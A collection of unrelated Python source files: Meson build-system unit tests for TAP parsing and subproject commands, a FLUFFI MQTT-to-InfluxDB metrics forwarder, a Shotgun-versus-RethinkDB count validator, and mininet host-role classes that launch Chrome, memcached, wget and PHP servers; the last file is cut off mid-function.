self.assert_plan(events, num_tests=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, num_tests=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, num_tests=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, num_tests=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, num_tests=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, num_tests=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, num_tests=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, num_tests=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, num_tests=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, num_tests=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
class SubprojectsCommandTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.root_dir = Path(self.builddir)
self.project_dir = self.root_dir / 'src'
self._create_project(self.project_dir)
self.subprojects_dir = self.project_dir / 'subprojects'
os.makedirs(str(self.subprojects_dir))
self.packagecache_dir = self.subprojects_dir / 'packagecache'
os.makedirs(str(self.packagecache_dir))
def _create_project(self, path, project_name='dummy'):
os.makedirs(str(path), exist_ok=True)
with open(str(path / 'meson.build'), 'w') as f:
f.write(f"project('{project_name}')")
def _git(self, cmd, workdir):
return git(cmd, str(workdir), check=True)[1].strip()
def _git_config(self, workdir):
self._git(['config', 'user.name', 'Meson Test'], workdir)
self._git(['config', 'user.email', 'meson.test@example.com'], workdir)
def _git_remote(self, cmd, name):
return self._git(cmd, self.root_dir / name)
def _git_local(self, cmd, name):
return self._git(cmd, self.subprojects_dir / name)
def _git_local_branch(self, name):
# Same as `git branch --show-current` but compatible with older git version
branch = self._git_local(['rev-parse', '--abbrev-ref', 'HEAD'], name)
return branch if branch != 'HEAD' else ''
def _git_local_commit(self, name, ref='HEAD'):
return self._git_local(['rev-parse', ref], name)
def _git_remote_commit(self, name, ref='HEAD'):
return self._git_remote(['rev-parse', ref], name)
def _git_create_repo(self, path):
# If a user has git configuration init.defaultBranch set we want to override that
with tempfile.TemporaryDirectory() as d:
out = git(['--version'], str(d))[1]
if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'):
extra_cmd = ['--initial-branch', 'master']
else:
extra_cmd = []
self._create_project(path)
self._git(['init'] + extra_cmd, path)
self._git_config(path)
self._git(['add', '.'], path)
self._git(['commit', '-m', 'Initial commit'], path)
def _git_create_remote_repo(self, name):
self._git_create_repo(self.root_dir / name)
def _git_create_local_repo(self, name):
self._git_create_repo(self.subprojects_dir / name)
def _git_create_remote_commit(self, name, branch):
self._git_remote(['checkout', branch], name)
self._git_remote(['commit', '--allow-empty', '-m', f'initial {branch} commit'], name)
def _git_create_remote_branch(self, name, branch):
self._git_remote(['checkout', '-b', branch], name)
self._git_remote(['commit', '--allow-empty', '-m', f'initial {branch} commit'], name)
def _git_create_remote_tag(self, name, tag):
self._git_remote(['commit', '--allow-empty', '-m', f'tag {tag} commit'], name)
self._git_remote(['tag', tag], name)
def _wrap_create_git(self, name, revision='master'):
path = self.root_dir / name
with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
f.write(textwrap.dedent(
'''
[wrap-git]
url={}
revision={}
'''.format(os.path.abspath(str(path)), revision)))
def _wrap_create_file(self, name, tarball='dummy.tar.gz'):
path = self.root_dir / tarball
with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
f.write(textwrap.dedent(
f'''
[wrap-file]
source_url={os.path.abspath(str(path))}
source_filename={tarball}
'''))
Path(self.packagecache_dir / tarball).touch()
def _subprojects_cmd(self, args):
return self._run(self.meson_command + ['subprojects'] + args, workdir=str(self.project_dir))
def test_git_update(self):
subp_name = 'sub1'
# Create a fake remote git repository and a wrap file. Checks that
# "meson subprojects download" works.
self._git_create_remote_repo(subp_name)
self._wrap_create_git(subp_name)
self._subprojects_cmd(['download'])
self.assertPathExists(str(self.subprojects_dir / subp_name))
self._git_config(self.subprojects_dir / subp_name)
# Create a new remote branch and update the wrap file. Checks that
# "meson subprojects update --reset" checkout the new branch.
self._git_create_remote_branch(subp_name, 'newbranch')
self._wrap_create_git(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Update remote newbranch. Checks the new commit is pulled into existing
# local newbranch. Make sure it does not print spurious 'git stash' message.
self._git_create_remote_commit(subp_name, 'newbranch')
out = self._subprojects_cmd(['update', '--reset'])
self.assertNotIn('No local changes to save', out)
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Update remote newbranch and switch to another branch. Checks that it
# switch current branch to newbranch and pull latest commit.
self._git_local(['checkout', 'master'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Stage some local changes then update. Checks that local changes got
# stashed.
self._create_project(self.subprojects_dir / subp_name, 'new_project_name')
self._git_local(['add', '.'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
self.assertTrue(self._git_local(['stash', 'list'], subp_name))
# Create a new remote tag and update the wrap file. Checks that
# "meson subprojects update --reset" checkout the new tag in detached mode.
self._git_create_remote_tag(subp_name, 'newtag')
self._wrap_create_git(subp_name, 'newtag')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), '')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newtag'))
# Create a new remote commit and update the wrap file with the commit id.
# Checks that "meson subprojects update --reset" checkout the new commit
# in detached mode.
self._git_local(['checkout', 'master'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
new_commit = self._git_remote(['rev-parse', 'HEAD'], subp_name)
self._wrap_create_git(subp_name, new_commit)
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), '')
self.assertEqual(self._git_local_commit(subp_name), new_commit)
# Create a local project not in a git repository, then update it with
# a git wrap. Without --reset it should print error message and return
# failure. With --reset it should delete existing project and clone the
# new project.
subp_name = 'sub2'
self._create_project(self.subprojects_dir / subp_name)
self._git_create_remote_repo(subp_name)
self._wrap_create_git(subp_name)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self._subprojects_cmd(['update'])
self.assertIn('Not a git repository', cm.exception.output)
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name))
@skipIfNoExecutable('true')
def test_foreach(self):
self._create_project(self.subprojects_dir / 'sub_file')
self._wrap_create_file('sub_file')
self._git_create_local_repo('sub_git')
self._wrap_create_git('sub_git')
self._git_create_local_repo('sub_git_no_wrap')
def ran_in(s):
ret = []
prefix = 'Executing command in '
for l in s.splitlines():
if l.startswith(prefix):
ret.append(l[len(prefix):])
return sorted(ret)
dummy_cmd = ['true']
out = self._subprojects_cmd(['foreach'] + dummy_cmd)
self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git', 'subprojects/sub_git_no_wrap']))
out = self._subprojects_cmd(['foreach', '--types', 'git,file'] + dummy_cmd)
self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git']))
out = self._subprojects_cmd(['foreach', '--types', 'file'] + dummy_cmd)
self.assertEqual(ran_in(out), ['subprojects/sub_file'])
out = self._subprojects_cmd(['foreach', '--types', 'git'] + dummy_cmd)
self.assertEqual(ran_in(out), ['subprojects/sub_git'])
def test_purge(self):
self._create_project(self.subprojects_dir / 'sub_file')
self._wrap_create_file('sub_file')
self._git_create_local_repo('sub_git')
self._wrap_create_git('sub_git')
def deleting(s) -> T.List[str]:
ret = []
prefix = 'Deleting '
for l in s.splitlines():
if l.startswith(prefix):
ret.append(l[len(prefix):])
return sorted(ret)
out = self._subprojects_cmd(['purge'])
self.assertEqual(deleting(out), [str(self.subprojects_dir / 'sub_file'), str(self.subprojects_dir / 'sub_git')])
out = self._subprojects_cmd(['purge', '--include-cache'])
self.assertEqual(deleting(out), [str(self.subprojects_dir / 'packagecache' / 'dummy.tar.gz'), str(self.subprojects_dir / 'sub_file'), str(self.subprojects_dir / 'sub_git')])
out = self._subprojects_cmd(['purge', '--include-cache', '--confirm'])
self.assertEqual(deleting(out), [str(self.subprojects_dir / 'packagecache' / 'dummy.tar.gz'), str(self.subprojects_dir / 'sub_file'), str(self.subprojects_dir / 'sub_git')])
self.assertFalse(Path(self.subprojects_dir / 'packagecache' / 'dummy.tar.gz').exists())
self.assertFalse(Path(self.subprojects_dir / 'sub_file').exists())
self.assertFalse(Path(self.subprojects_dir / 'sub_git').exists())
def _clang_at_least(compiler: 'Compiler', minver: str, apple_minver: T.Optional[str]) -> bool:
"""
check that Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleCLang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
if apple_minver is None:
return False
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.CFLAGS_MAPPING.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
if arg in ('-f', '--failfast'):
arg = '--exitfirst'
pytest_args.append(arg)
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def running_single_tests(argv, cases):
'''
Check whether we only got arguments for running individual tests, not
entire testcases, and not all testcases (no test args).
'''
got_test_arg = False
for arg in argv:
if arg.startswith('-'):
continue
for case in cases:
if not arg.startswith(case):
continue
if '.' not in arg:
# Got a testcase, done
return False
got_test_arg = True
return got_test_arg
def setup_backend():
filtered = []
be = 'ninja'
for a in sys.argv:
if a.startswith('--backend'):
be = a.split('=')[1]
else:
filtered.append(a)
# Since we invoke the tests via unittest or xtest test runner
# we need to pass the backend to use to the spawned process via
# this side channel. Yes it sucks, but at least is is fully
# internal to this file.
os.environ['MESON_UNIT_TEST_BACKEND'] = be
sys.argv = filtered
def main():
unset_envs()
setup_backend()
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests', 'SubprojectsCommandTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = []
# Don't use pytest-xdist when running single unit tests since it wastes
# time spawning a lot of processes to distribute tests to in that case.
if not running_single_tests(sys.argv, cases):
pytest_args += ['-n', 'auto']
# Let there be colors!
if 'CI' in os.environ:
pytest_args += ['--color=yes']
pytest_args += ['./run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# Fallback to plain unittest.
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
setup_vsenv()
print('Meson build system', mesonbuild.coredata.version, 'Unit Tests')
start = time.monotonic()
try:
raise SystemExit(main())
finally:
print('Total time: {:.3f} seconds'.format(time.monotonic() - start))
|
sync.py | #!/usr/bin/env python3
# Copyright 2017-2020 Siemens AG
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including without
# limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# Author(s): Roman Bendt, Thomas Riedmaier
import paho.mqtt.client as mqtt
import datetime
import time
import math
from threading import Thread, Lock
from influxdb import InfluxDBClient
mutex = Lock()
cumulated_json = []
seenmachines = {}
def watchdog_push():
global seenmachines, mutex, cumulated_json
while True:
time.sleep(5)
now = datetime.datetime.utcnow()
json_body = []
for m, l in seenmachines.items():
json_body.append({
"measurement": "lastseen",
"tags": {
"machine": m,
},
"time": now,
"fields": {
"value": math.ceil((now-l).total_seconds())
}
})
print("=========================== POSTING ACUMULATED DATA ===========================")
sendingcopy = []
with mutex:
if len(json_body) is not 0:
for i in json_body:
cumulated_json.append(i)
sendingcopy = cumulated_json
cumulated_json = []
dbclient.write_points(sendingcopy)
def on_message(client, userdata, msg):
global seenmachines, mutex, cumulated_json
# FLUFFI/state/machine/measurement
# FLUFFI/webui/measurement
# FLUFFI/cmd/commandname
info = msg.topic.split('/')[1:]
# Use utc as timestamp
receiveTime=datetime.datetime.utcnow()
message=msg.payload.decode("utf-8")
isfloatValue=False
try:
# Convert the string to a float so that it is stored as a number and not a string in the database
val = float(message)
isfloatValue=True
except:
print("Could not convert " + message + " to a float value")
val = message
isfloatValue=False
print(str(receiveTime) + ": " + msg.topic + " " + str(val))
json_body = []
if info[0] == "cmd":
# FLUFFI/cmd/forget-machine <machinename>
if info[1] == "forget-machine":
print("order to delete", message)
with mutex:
try:
del seenmachines[message]
except KeyError:
pass
else:
pass
elif info[0] == "state":
if isfloatValue:
machine = info[1]
measurement = info[2]
if ':' in measurement:
mspl = measurement.split(':')
measurement = mspl[0]
machine += mspl[1]
json_body = [
{
"measurement": measurement,
"tags": {
"machine": machine,
},
"time": receiveTime,
"fields": {
"value": val
}
}
]
with mutex:
seenmachines[info[1]] = receiveTime
elif info[0] == "webui":
if isfloatValue:
submodule = info[0] # always webui
measurement = info[1]
json_body = [
{
"measurement": measurement,
"tags": {
"webui": submodule,
},
"time": receiveTime,
"fields": {
"value": val
}
}
]
with mutex:
seenmachines['webui'] = receiveTime
else:
print("invalid module received")
return
if len(json_body) is not 0:
with mutex:
for i in json_body:
cumulated_json.append(i)
def on_connect(client, userdata, flags, rc):
print("Connected with result code "+str(rc))
client.subscribe("FLUFFI/#",2)
def on_disconnect(client, userdata, rc=0):
print("disconnected with result code ", str(rc))
client.loop_stop()
# Set up a client for InfluxDB
dbclient = InfluxDBClient('localhost', 8086, 'root', 'root', 'FLUFFI')
# Initialize the MQTT client that should connect to the broker
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
# thread to collect and send data
t = Thread(target=watchdog_push)
conOK = False
while(conOK == False):
try:
client.connect("localhost", 1883, 5)
conOK = True
except:
conOK = False
time.sleep(2)
# start collector
t.start()
# loop to the broker
client.loop_start()
while True:
time.sleep(5)
|
validateCounts.py | import os
import time
import logging
import datetime
import multiprocessing
import Queue
import rethinkdb
__all__ = [
'CountValidator'
]
LOG = logging.getLogger(__name__)
class CountValidator(object):
def __init__(self, config, entityConfigs):
super(CountValidator, self).__init__()
self.config = config
self.entityConfigs = entityConfigs
self.workQueue = multiprocessing.JoinableQueue()
self.resultQueue = multiprocessing.Queue()
self.processes = []
self.results = []
def start(self, raiseExc=True):
LOG.info("Starting Validate Counts")
self.launchWorkers()
self.run()
self.terminateWorkers()
if raiseExc:
failed = []
for result in self.results:
if result['failed']:
failed.append(result)
if len(failed):
raise RuntimeError("Validation Failed, {0} cached entity type(s) do not match".format(len(failed)))
return self.results
def launchWorkers(self):
processCount = min(len(self.entityConfigs), self.config['validate_counts.processes'])
LOG.debug("Launching {0} validate workers".format(processCount))
for n in range(processCount):
worker = CountValidateWorker(self.workQueue, self.resultQueue, self.config, self.entityConfigs)
proc = multiprocessing.Process(target=worker.start)
proc.start()
self.processes.append(proc)
def run(self):
LOG.debug("Adding items to validate queue")
for config in self.entityConfigs:
data = {'configType': config.type}
self.workQueue.put(data)
self.workQueue.join()
results = []
while True:
try:
result = self.resultQueue.get(False)
except Queue.Empty:
break
else:
if result:
results.append(result)
self.results = results
def terminateWorkers(self):
LOG.debug("Terminating validate workers")
for proc in self.processes:
proc.terminate()
self.processes = []
class CountValidateWorker(object):
def __init__(self, workQueue, resultQueue, config, entityConfigs):
super(CountValidateWorker, self).__init__()
self.workQueue = workQueue
self.resultQueue = resultQueue
self.config = config
self.entityConfigs = dict([(c.type, c) for c in entityConfigs])
self.sg = None
self.rethink = None
def start(self):
self.sg = self.config.createShotgunConnection(convert_datetimes_to_utc=False)
self.rethink = self.config.createRethinkConnection()
self.run()
def run(self):
workerPID = os.getpid()
LOG.debug("Validate Worker Running: {0}".format(workerPID))
while True:
try:
work = self.workQueue.get()
except Queue.Emtpy:
continue
time.sleep(0.1)
entityConfig = self.entityConfigs[work['configType']]
LOG.debug("Getting Shotgun counts for type: '{0}'".format(work['configType']))
sgResult = self.sg.summarize(entityConfig.type, [], summary_fields=[{'field': 'id', 'type': 'count'}])
sgCount = sgResult['summaries']['id']
cacheCount = 0
try:
LOG.debug("Getting cache counts for type: '{0}'".format(work['configType']))
cacheSearchTime = datetime.datetime.utcnow()
cacheCount = rethinkdb.table(entityConfig['table']).count().run(self.rethink)
except rethinkdb.errors.RqlRuntimeError:
cacheCount = 0
# Find the diff of events that have happened in Shotgun, but not been saved to the cache yet
# Searches all event log entries for this entity type that are New, Retired, or Revive occurring in the past fetch_interval
# including a small amount of processing padding for the cache
self.config.history.load()
latestCachedEventID = self.config.history['latest_event_log_entry']['id']
minTime = cacheSearchTime - datetime.timedelta(seconds=self.config['monitor.fetch_interval'] + 0.05)
maxTime = cacheSearchTime
eventTypes = ['Shotgun_{entityType}_{changeType}'.format(entityType=entityConfig.type, changeType=t) for t in ['New', 'Retirement', 'Revival']]
eventLogFilters = [
['event_type', 'in', eventTypes],
['created_at', 'between', [minTime, maxTime]],
['id', 'greater_than', latestCachedEventID]
]
LOG.debug("Getting Pending Event Log Entries for type: '{0}'".format(work['configType']))
eventLogEntries = self.sg.find('EventLogEntry', eventLogFilters, ['event_type', 'id'])
additions = len([e for e in eventLogEntries if 'New' in e['event_type'] or 'Revival' in e['event_type']])
removals = len([e for e in eventLogEntries if 'Retirement' in e['event_type']])
pendingDiff = additions - removals
failed = sgCount - pendingDiff != cacheCount
if failed:
LOG.debug("'{0}' counts don't match, SG: {1} Cache: {2}".format(entityConfig.type, sgCount, cacheCount))
else:
LOG.debug("'{0}' counts match, SG: {1} Cache: {2}".format(entityConfig.type, sgCount, cacheCount))
result = {
'work': work,
'entityType': work['configType'],
'failed': failed,
'sgCount': sgCount,
'pendingEvents': len(eventLogEntries),
'pendingDiff': pendingDiff,
'cacheCount': cacheCount,
}
self.resultQueue.put(result)
self.workQueue.task_done()
|
roles.py | #!/usr/bin/env python
"""
HostRole: superclass for all roles (single instance of an application)
running on a host.
ChromeClient: starts a chrome instance on the host
MemcacheServer: starts a memcached instance on the host on the default port
WgetClient: retrieves specified page from a specified server and averages
response time over specified number of trials
PhpServer: starts php server on a specified port using a specified
document root directory
PhpServerMemcacheClient: starts a php server as a memcached client, modifying
template php document to use specified memcached server(s) IP address(es)
"""
import os
import re
import subprocess
import sys
import threading
from time import time, sleep
from mininet.net import Mininet
from mininet.cli import CLI
import minidc.stats
def start(mn, *procs):
map(lambda p: p.init(), procs)
map(lambda p: p.start(), procs)
def stop(*procs):
map(lambda p: p.stop(), procs)
class HostRole(object):
def __init__(self, host):
self.procStr = None
self.proc = None
self.host = host
self.stdout = "/tmp/{0}-{1}.log".format(host.IP(),
self.__class__.__name__)
self.stderr = "/tmp/{0}-{1}.err".format(host.IP(),
self.__class__.__name__)
def init(self):
pass
def start(self):
self.proc = self.host.popen(self.procStr,
stdout=open(self.stdout, "wb"),
stderr=open(self.stderr, "wb"))
def stop(self):
# subclasses can call proc.wait(), so proc may have already terminated
try:
self.proc.terminate()
except Exception:
pass
def IP(self):
return self.host.IP()
def __repr__(self):
return self.__str__()
class EmptyRole(HostRole):
def __init__(self, host, name="Empty"):
super(EmptyRole, self).__init__(host)
self.name = name
def init(self):
pass
def start(self):
pass
def stop(self):
pass
def __str__(self):
return self.name
class ChromeClient(HostRole):
def __init__(self, host, url=None, datadir="./"):
super(ChromeClient, self).__init__(host)
self.datadir = os.path.join(datadir, host.name + "-datadir")
self.procStr = "/opt/google/chrome/google-chrome --enable-logging --v=1 --user-data-dir={0} {1}".format(self.datadir, url)
def __str__(self):
return "Chrome Client"
class MemcacheServer(HostRole):
def __init__(self, host):
super(MemcacheServer, self).__init__(host)
self.procStr = "memcached -u nobody"
def __str__(self):
return "Memcached Server"
class WgetClient(HostRole):
def __init__(self, host, url, trials=-1, toFile=False):
super(WgetClient, self).__init__(host)
self.trials = trials
self.procStr = "wget -q -O - {0}".format(url)
self.cont = True
self.toFile = toFile
def start(self):
thread = threading.Thread(target=self.threadStart)
thread.start()
def stop(self):
super(WgetClient, self).stop()
self.cont = False
def threadStart(self):
loadtimes = []
rettimes = []
i = 0
while self.cont and (self.trials == -1 or i < self.trials):
i += 1
elapsed = time()
if self.toFile:
self.proc = self.host.popen(self.procStr,
stdout=open(self.stdout, "ab+"),
stderr=open(self.stderr, "ab+"))
self.proc.wait()
else:
self.proc = self.host.popen(self.procStr,
stdout=subprocess.PIPE,
stderr=open(self.stderr, "ab+"))
text = self.proc.communicate()[0]
# save load time
elapsed = time() - elapsed
loadtimes.append(elapsed)
if not self.toFile:
p = re.compile('\d*[.]?\d+')
finds = p.findall(text)
if len(finds) > 0:
rettimes.append(float(finds[0]))
minidc.stats.mcStats.add(self.host.name,
float(finds[0]))
if self.toFile:
# parse output for memcache times
lines = [line.strip() for line in open(self.stdout)]
p = re.compile('\d*[.]?\d+')
rettimes = []
for line in lines:
finds = p.findall(line)
if len(finds) > 0:
rettimes.append(float(finds[0]))
if len(rettimes) > 0:
retavg = (reduce(lambda x, y: x + y, rettimes) / len(rettimes))
loadavg = (reduce(lambda x, y: x + y, loadtimes) / len(loadtimes)) * 1000
print "{0}: Avg times - obj: {1}, load: {2}".format(self.IP(),
round(retavg, 3),
round(loadavg, 3))
# print "\n****************************************************"
# print "Average obj retrieval time:", round(retavg, 3), "ms"
# print "Average load time:", round(loadavg, 3), "ms"
# print "****************************************************\n"
def __str__(self):
return "Wget Client"
class PhpServer(HostRole):
def __init__(self, host, wwwdir, port=80, page="index.php"):
super(PhpServer, self).__init__(host)
self.procStr = "sudo php -S {0}:{1} -t {2}".format(host.IP(),
port,
wwwdir)
self.port = port
self.page = page
self.wwwdir = wwwdir
def url(self):
return "http://{0}:{1}".format(self.host.IP(),
self.port)
def docUrl(self):
return "http://{0}:{1}/{2}".format(self.host.IP(),
self.port,
self.page)
def __str__(self):
return "PHP Server"
class PhpServerMemcacheClient(PhpServer):
def __init__(self, host, wwwdir, mcSrvList=None, port=80, template=None, outFile="index.php"):
super(PhpServerMemcacheClient, self).__init__(host, wwwdir, port, page=outFile)
self.mcSrvList = mcSrvList
self.outFile = outFile
self.template = template
def init(self):
if self.template:
srvs = "array(" + ",".join(["array('%s', 11211)" % s for s in self.mcSrvList]) + ")"
php = ""
f = open(self.template)
lines = f.readlines()
for l in lines:
l =re.sub("addServer\(.*\)", "addServers(" + srvs + ")", l)
php += l
f.close()
f = open(self.wwwdir + "/" + self.outFile, 'w+')
f.write(php)
f.close()
def __str__(self):
return "PHP Server (Memcached Client)"
class RepGetClient(HostRole):
def __init__(self, host, srvs, trials=-1, activeReps=None):
super(RepGetClient, self).__init__(host)
self.trials = trials
self.procStr = None
self.cont = True
self.srvs = srvs
self.host = host
self.lock = threading.Lock()
if activeReps is None:
self.activeReps = len(self.srvs)
else:
self.activeReps = activeReps
def start(self):
thread = threading.Thread(target=self.threadStart)
thread.start()
def stop(self):
self.cont = False
def execPhp(self, code):
proc = self.host.popen(['php'],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
close_fds=True)
output = proc.communicate(code)[0]
try:
os.kill(proc.pid, signal.SIGTERM)
except:
pass
return output
def setActiveReps(self, num):
self.lock.acquire()
try:
self.activeReps = num
print "{0}: using {1} replicated servers".format(self.host.name,
self.activeReps)
finally:
self.lock.release()
def threadStart(self):
rettimes = []
print "{0} using {1} replicas".format(self.host.name,
self.activeReps)
iters = 0
while self.cont and (self.trials == -1 or iters < self.trials):
iters += 1
self.lock.acquire()
try:
active = self.srvs[:self.activeReps]
finally:
self.lock.release()
threadtimes = [None] * len(active)
threads = [None] * len(active)
if True:
for i, h in enumerate(active):
threads[i] = threading.Thread(target=self.mcget,
args=(h, threadtimes, i))
threads[i].start()
for i in range(len(threads)):
threads[i].join()
# print threadtimes
minidc.stats.mcStats.add(self.host.name,
round(max(threadtimes) * 1000, 3))
# save some CPU cycles, throttle memcache requests
sleep(0.2)
def mcget(self, srv, result, index):
code = "<?php $mem = new Memcached();\n"
code += "$mem->addServer(\"" + srv + "\", 11211);\n"
code += """$time_start = microtime(true);
$result = $mem->get("blah");
if ($result) {
//echo "Item retrieved from memcached";
} else {
//echo "No matching key, adding";
$mem->set("blah", "blah", 3600) or die("Couldn't save to mc");
}
$time_end = microtime(true);
$time = $time_end - $time_start;
//$time = round($time * 1000, 3);
echo "\r\n$time";
?>"""
res = self.execPhp(code)
try:
elapsed = float(res)
except:
